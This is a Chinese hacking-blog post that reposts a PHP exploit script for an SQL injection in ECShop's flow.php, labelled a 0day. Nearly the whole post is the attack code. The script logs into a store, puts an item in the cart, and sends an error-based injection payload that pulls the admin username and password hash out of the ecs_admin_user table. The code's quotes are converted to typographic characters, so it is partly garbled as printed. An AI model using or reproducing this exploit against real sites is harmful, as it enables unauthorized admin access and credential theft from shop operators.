记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

ecshop-flow.php SQL injection 0DAY

2013-01-08 01:10

exp:

<?php
echo ”
+———————————————————————–+
+Info: EXP for ECSHOP SQL injection+
+Code by  admin@ashker.net  +
+———————————————————————–+

“;
if($argc<3){
echo “Usage: exploit.php user password http://www.shop.com/shop”;
die();
}
$username=$argv[1];
$password=$argv[2];
$host=$argv[3];
$payload=”country=1&district=409&consignee=matt&email=matt%40qq.com&address=matt&zipcode=matt&tel=matt&mobile=matt&sign_building=matt&best_time=matt&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkoute&address_id=&province=3″;
$payload.=”‘ and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x3a,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #”;
$myheader=array(
‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,
‘Accept-Language: zh-cn,zh;q=0.5′,
‘Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7′,
‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8′,
‘Referer: http://www.ashker.net/’,
‘Connection: Keep-Alive’,
‘Cache-Control: no-cache’,
‘User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)’
);
//登陆获取cookie
$cookie=”";
$str=curlsend(“$host/user.php”,”POST”,0,$myheader,”username=$username&password=$password&act=act_login&back_act=http%3A%2F%2F127.0.0.1%2Fshop%2F&submit=”,1);
preg_match_all(“/Set-Cookie:([^;]+)/is”,$str,$array);
for($i=0;$i<count($array[1]);$i++){
$cookie=$cookie.”;”.$array[1][$i];
}
echo “cookie:.$cookie\n”;
//获取一个商品ID并加入购物车,否则失败

$goods=curlsend(“$host/”,”GET”,0,$myheader,”,1);
preg_match(‘#goods\.php\?id=([0-9]{1,8})#’, $goods, $hash);
$goodsid=$hash[1];
echo “goodsid:$goodsid\n”;
curlsend(“$host/flow.php?step=add_to_cart”,”POST”,0,$myheader,”goods={\”quick\”:1,\”spec\”:[\"\"],\”goods_id\”:$goodsid,\”number\”:\”1\”,\”parent\”:0}”,1);
//les’go
$buffer=curlsend(“$host/flow.php”,”POST”,0,$myheader,$payload,1);
//echo $buffer;
if(strpos($buffer,’doesn\’t exist’)) {
die(‘表名可能修改,请手工注射’);
}
preg_match(‘#\’([\S]+):([a-z0-9]{32})#’, $buffer, $hash);
echo “username:”.$hash[1].”\npassword:”.$hash[2];

function curlsend($url,$method=false,$ssl=0,$myheader,$data=”,$header=0){
global $cookie;
$ch = curl_init();
$timeout = 0;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_POST, $method);
curl_setopt ($ch, CURLOPT_HTTPHEADER,$myheader);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
if($data){
curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
}
curl_setopt ($ch, CURLOPT_HEADER, $header);
if($ssl){
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
}
$handles = curl_exec($ch);
curl_close($ch);
return $handles;
}
?>

知识来源: www.ashker.net/index.php/archives/634

阅读:280661 | 评论:0 | 标签:0day PHP

想收藏或者和大家分享这篇好文章→复制链接地址

“ecshop-flow.php SQL injection 0DAY”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云